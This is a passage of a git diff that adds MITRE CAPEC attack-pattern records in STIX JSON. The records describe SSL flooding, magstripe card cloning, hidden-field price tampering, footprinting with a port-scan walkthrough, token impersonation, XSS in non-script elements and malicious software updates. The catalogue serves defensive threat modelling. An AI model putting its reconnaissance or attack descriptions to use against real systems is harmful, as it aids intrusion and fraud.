"attack-pattern--b25dde95-64c2-4432-985b-e3e122866b2e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Removing/short-circuiting 'guard logic'", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-207 : Removing Important Client Functionality. Please refer to this other pattern going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/56.html", + "external_id": "CAPEC-56" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b31704a3-c801-44d0-b683-3e8c9cb054c2.json b/capec/attack-pattern/attack-pattern--b31704a3-c801-44d0-b683-3e8c9cb054c2.json new file mode 100644 index 0000000000..403a926403 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b31704a3-c801-44d0-b683-3e8c9cb054c2.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--49ab04fb-e502-430a-bcab-99c3f2b94a0a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b31704a3-c801-44d0-b683-3e8c9cb054c2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "SSL Flood", + "description": "An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/489.html", + "external_id": "CAPEC-489" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b3416db0-be75-481a-92f0-447262e2aa7e.json b/capec/attack-pattern/attack-pattern--b3416db0-be75-481a-92f0-447262e2aa7e.json new file mode 100644 index 0000000000..a641dcc0a4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b3416db0-be75-481a-92f0-447262e2aa7e.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--6ce5b53c-5899-4d91-a2b3-bdef1cbb3b2d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b3416db0-be75-481a-92f0-447262e2aa7e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html", + "external_id": "CAPEC-397" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b37c8702-c86b-41c9-877c-693488005cac.json b/capec/attack-pattern/attack-pattern--b37c8702-c86b-41c9-877c-693488005cac.json new file mode 100644 index 0000000000..03e1707282 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b37c8702-c86b-41c9-877c-693488005cac.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--a51e68a8-7444-4610-9da1-272c6553f920", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b37c8702-c86b-41c9-877c-693488005cac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Manipulating Hidden Fields", + "description": "An adversary exploits a weakness in the server's trust of client-side processing by modifying data on the client-side, such as price information, and then submitting this data to the server, which processes the modified data. For example, eShoplifting is a data manipulation attack against an on-line merchant during a purchasing transaction. The manipulation of price, discount or quantity fields in the transaction message allows the adversary to acquire items at a lower cost than the merchant intended. The adversary performs a normal purchasing transaction but edits hidden fields within the HTML form response that store price or other information to give themselves a better deal. The merchant then uses the modified pricing information in calculating the cost of the selected items.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/162.html", + "external_id": "CAPEC-162" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted site must contain hidden fields to be modified.", + "The targeted site must not validate the hidden fields with backend processing." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to modify hidden fields by editing the HTTP response to the server." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec.json b/capec/attack-pattern/attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec.json new file mode 100644 index 0000000000..d80980afbf --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--b503d65d-7cea-46c0-a15f-f1790ef2c04d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Footprinting", + "description": "An adversary engages in probing and exploration activities to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/169.html", + "external_id": "CAPEC-169" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Manic Velocity, Footprinting And The Basics Of Hacking, Web Textfiles", + "url": "http://web.textfiles.com/hacking/footprinting.txt", + "external_id": "REF-31" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Eddie Sutton, Footprint: What Is And How Do You Erase Them", + "url": "http://www.infosecwriters.com/text_resources/pdf/Footprinting.pdf", + "external_id": "REF-32" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "In this example let us look at the website http://www.example.com to get much information we can about Alice. From the website, we find that Alice also runs foobar.org. We type in www example.com into the prompt of the Name Lookup window in a tool, and our result is this IP address: 192.173.28.130 We type the domain into the Name Lookup prompt and we are given the same IP. We can safely say that example and foobar.org are hosted on the same box. But if we were to do a reverse name lookup on the IP, which domain will come up? www.example.com or foobar.org? Neither, the result is nijasvspirates.org. So nijasvspirates.org is the name of the box hosting 31337squirrel.org and foobar.org. So now that we have the IP, let's check to see if nijasvspirates is awake. We type the IP into the prompt in the Ping window. We'll set the interval between packets to 1 millisecond. We'll set the number of seconds to wait until a ping times out to 5. We'll set the ping size to 500 bytes and we'll send ten pings. Ten packets sent and ten packets received. nijasvspirates.org returned a message to my computer within an average of 0.35 seconds for every packet sent. nijasvspirates is alive. We open the Whois window and type nijasvspirates.org into the Query prompt, and whois.networksolutions.com into the Server prompt. This means we'll be asking Network Solutions to tell us everything they know about nijasvspirates.org. The result is this laundry list of info: Registrant: FooBar (nijasvspirates -DOM) p.o.box 11111 SLC, UT 84151 US Domain Name: nijasvspirates.ORG Administrative Contact, Billing Contact: Smith, John jsmith@anonymous.net FooBar p.o.box 11111 SLC, UT 84151 555-555-6103 Technical Contact: Johnson, Ken kj@fierymonkey.org fierymonkey p.o.box 11111 SLC, UT 84151 555-555-3849 Record last updated on 17-Aug-2001. Record expires on 11-Aug-2002. Record created on 11-Aug-2000. Database last updated on 12-Dec-2001 04:06:00 EST. Domain servers in listed order: NS1. fierymonkey.ORG 192.173.28.130 NS2. fierymonkey.ORG 64.192.168.80 A corner stone of footprinting is Port Scanning. Let's port scan nijasvspirates.org and see what kind of services are running on that box. We type in the nijasvspirates IP into the Host prompt of the Port Scan window. We'll start searching from port number 1, and we'll stop at the default Sub7 port, 27374. Our results are: 21 TCP ftp 22 TCP ssh SSH-1.99-OpenSSH_2.30 25 TCP smtp 53 TCP domain 80 TCP www 110 TCP pop3 111 TCP sunrpc 113 TCP ident Just by this we know that Alice is running a website and email, using POP3, SUNRPC (SUN Remote Procedure Call), and ident." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An application must publicize identifiable information about the system or application through voluntary or involuntary means. Certain identification details of information systems are visible on communication networks (e.g., if an adversary uses a sniffer to inspect the traffic) due to their inherent structure and protocol standards. Any system or network that can be detected can be footprinted. However, some configuration choices may limit the useful information that can be collected during a footprinting attack." + ], + "x_capec_resources_required": [ + "The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Low": "The adversary knows how to send HTTP request, run the scan tool." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b4167cd3-5fad-4e84-ab0d-e24543675a1b.json b/capec/attack-pattern/attack-pattern--b4167cd3-5fad-4e84-ab0d-e24543675a1b.json new file mode 100644 index 0000000000..ce240c9059 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b4167cd3-5fad-4e84-ab0d-e24543675a1b.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--31201408-720d-4c13-8254-3d340b49bb9b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b4167cd3-5fad-4e84-ab0d-e24543675a1b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-04-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Token Impersonation", + "description": "An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/633.html", + "external_id": "CAPEC-633" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic (By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed.)", + "Gain Privileges (By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had.)", + "Hide Activities (Faking the source of data or services can be used to create a false trail in logs as the target will associated any actions with the impersonated identity instead of the adversary.)" + ] + }, + "x_capec_prerequisites": [ + "This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b4319874-a526-49a3-b741-b34ad0657c4e.json b/capec/attack-pattern/attack-pattern--b4319874-a526-49a3-b741-b34ad0657c4e.json new file mode 100644 index 0000000000..6ed86c0b03 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b4319874-a526-49a3-b741-b34ad0657c4e.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--c2ed587f-5d6c-442f-9da1-0dbd95e69026", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b4319874-a526-49a3-b741-b34ad0657c4e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Hardware Integrity Attack", + "description": "An adversary exploits a weakness in the system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/440.html", + "external_id": "CAPEC-440" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Influence over the deployed system at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b44beaa2-63aa-4cbc-b46e-62fd6ea708c5.json b/capec/attack-pattern/attack-pattern--b44beaa2-63aa-4cbc-b46e-62fd6ea708c5.json new file mode 100644 index 0000000000..a608dee1cf --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b44beaa2-63aa-4cbc-b46e-62fd6ea708c5.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--d7a539c2-3fda-44f9-bf3a-82604a7a0fda", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b44beaa2-63aa-4cbc-b46e-62fd6ea708c5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Process Footprinting", + "description": "An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/573.html", + "external_id": "CAPEC-573" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_example_instances": [ + "On a Windows system, the command, \"tasklist,\" displays information about processes. The same function on a Mac OS system is done with the command, \"ps.\"", + "In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b51edcf5-b372-4b85-8155-09c49a9ebddf.json b/capec/attack-pattern/attack-pattern--b51edcf5-b372-4b85-8155-09c49a9ebddf.json new file mode 100644 index 0000000000..64ddc58dab --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b51edcf5-b372-4b85-8155-09c49a9ebddf.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--6f0b0a6f-6c17-4f47-9d95-d6f512dc211c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b51edcf5-b372-4b85-8155-09c49a9ebddf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "XSS Targeting Non-Script Elements", + "description": "This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application's elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/18.html", + "external_id": "CAPEC-18" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html", + "external_id": "CWE-80" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. A malicious user embeds JavaScript in the IMG tags in his messages that gets executed within the victim's browser whenever the victim reads these messages.\n \n When executed within the victim's browser, the malicious script could accomplish a number of adversary objectives including stealing sensitive information such as usernames, passwords, or cookies.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target client software must allow the execution of scripts generated by remote hosts." + ], + "x_capec_resources_required": [ + "Ability to include malicious script in document, e.g. HTML file, or XML document. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine" + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an adversary can simply edit content such as XML payload or HTML files that are sent to client machine." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b55ae5bb-98b3-49e0-8a91-1b719e141681.json b/capec/attack-pattern/attack-pattern--b55ae5bb-98b3-49e0-8a91-1b719e141681.json new file mode 100644 index 0000000000..f396bf6d25 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b55ae5bb-98b3-49e0-8a91-1b719e141681.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--6fe91686-c36c-477d-aec1-b8fa7ae01165", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b55ae5bb-98b3-49e0-8a91-1b719e141681", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Malware-Directed Internal Reconnaissance", + "description": "Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/529.html", + "external_id": "CAPEC-529" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have internal, logical access to the target network and system." + ], + "x_capec_resources_required": [ + "The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Medium": "The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b55bc5fa-6675-45db-a480-31c86947a2b0.json b/capec/attack-pattern/attack-pattern--b55bc5fa-6675-45db-a480-31c86947a2b0.json new file mode 100644 index 0000000000..473351907d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b55bc5fa-6675-45db-a480-31c86947a2b0.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--0d75d4b4-de1b-42db-b5b7-d5e9086c035c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b55bc5fa-6675-45db-a480-31c86947a2b0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via Infected Peripheral Device", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/451.html", + "external_id": "CAPEC-451" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b5d9986e-3ce3-4e71-b9db-34c715b57579.json b/capec/attack-pattern/attack-pattern--b5d9986e-3ce3-4e71-b9db-34c715b57579.json new file mode 100644 index 0000000000..25e22a7e50 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b5d9986e-3ce3-4e71-b9db-34c715b57579.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--c5a2561f-a863-4349-9591-0a86c6612722", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b5d9986e-3ce3-4e71-b9db-34c715b57579", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Software Update", + "description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code believed to be a valid update that originates from an attacker controlled source. Although there are several variations to this strategy of attack, the attack methods are united in that all rely on the ability of an attacker to position and disguise malicious content such that it masquerades as a legitimate software update which is then processed by a program, undermining application integrity. As such the attack employs 'spoofing' techniques augmented by psychological or technological mechanisms to disguise the update and/or its source. Virtually all software requires frequent updates or patches, giving the attacker immense latitude when structuring the attack, as well as many targets of opportunity. Attacks involving malicious software updates can be targeted or untargeted in reference to a population of users, and can also involve manual and automatic means of payload installation. Untargeted attacks rely upon a mass delivery system such as spamming, phishing, or trojans/botnets to distribute emails or other messages to vast populations of users. Targeted attacks aim at a particular demographic or user population. Corporate Facebook or Myspace pages make it easy to target users of a specific company or affiliation without relying on email address harvesting or spamming. One phishing-assisted variation on this attack involves hosting what appears to be a software update, then harvesting actual email addresses for an organization, or generating commonly used email addresses, and then sending spam, phishing, or spear-phishing emails to the organization's users requesting that they manually download and install the malicious software update. This type of attack has also been conducted using an Instant Messaging virus payload, which harvests the names from a user's contact list and sends instant messages to those users to download and apply the update. While both methods involve a high degree of automated mechanisms to support the attack, the primary vector for achieving the installation of the update remains a manual user-directed process, although clicking a link within an IM client or web application may initiate the update. Other class of attacks focus on firmware, where malicious updates are made to the core system firmware or BIOS. Since this occurs outside the controls of the operating system, the OS detection and prevention mechanisms do not aid, thus allowing an adversary to evade defenses as well as gain persistence on the target's system. Automated attacks involving malicious software updates require little to no user-directed activity and are therefore advantageous because they avoid the complex preliminary setup stages of manual attacks, which must effectively 'hook' users while avoiding countermeasures such as spam filters or web security filters.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/186.html", + "external_id": "CAPEC-186" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html", + "external_id": "CWE-494" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands (Utilize the built-in software update mechanisms of the commercial components to deliver software that could compromise security credentials, enable a denial-of-service attack, or enable tracking.)" + ], + "Availability": [ + "Execute Unauthorized Commands (Utilize the built-in software update mechanisms of the commercial components to deliver software that could compromise security credentials, enable a denial-of-service attack, or enable tracking.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Utilize the built-in software update mechanisms of the commercial components to deliver software that could compromise security credentials, enable a denial-of-service attack, or enable tracking.)" + ] + }, + "x_capec_resources_required": [ + "Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code." + ], + "x_capec_skills_required": { + "High": "This attack requires advanced cyber capabilities" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b614ab89-0be4-4e89-aa5a-86cab27e743d.json b/capec/attack-pattern/attack-pattern--b614ab89-0be4-4e89-aa5a-86cab27e743d.json new file mode 100644 index 0000000000..78abcb08cc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b614ab89-0be4-4e89-aa5a-86cab27e743d.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--9a9aff39-23dd-4f6a-8b0d-c52ff99429a0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b614ab89-0be4-4e89-aa5a-86cab27e743d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Timestamp Request", + "description": "This pattern of attack leverages standard requests to learn the exact time associated with a target system. An adversary may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/295.html", + "external_id": "CAPEC-295" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc792.html", + "external_id": "REF-123" + }, + { + "source_name": "reference_from_CAPEC", + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "url": "http://www.faqs.org/rfcs/rfc1122.html", + "external_id": "REF-124" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mark Wolfgang, Host Discovery with Nmap, 2002--11", + "url": "http://nmap.org/docs/discovery.pdf", + "external_id": "REF-125" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official 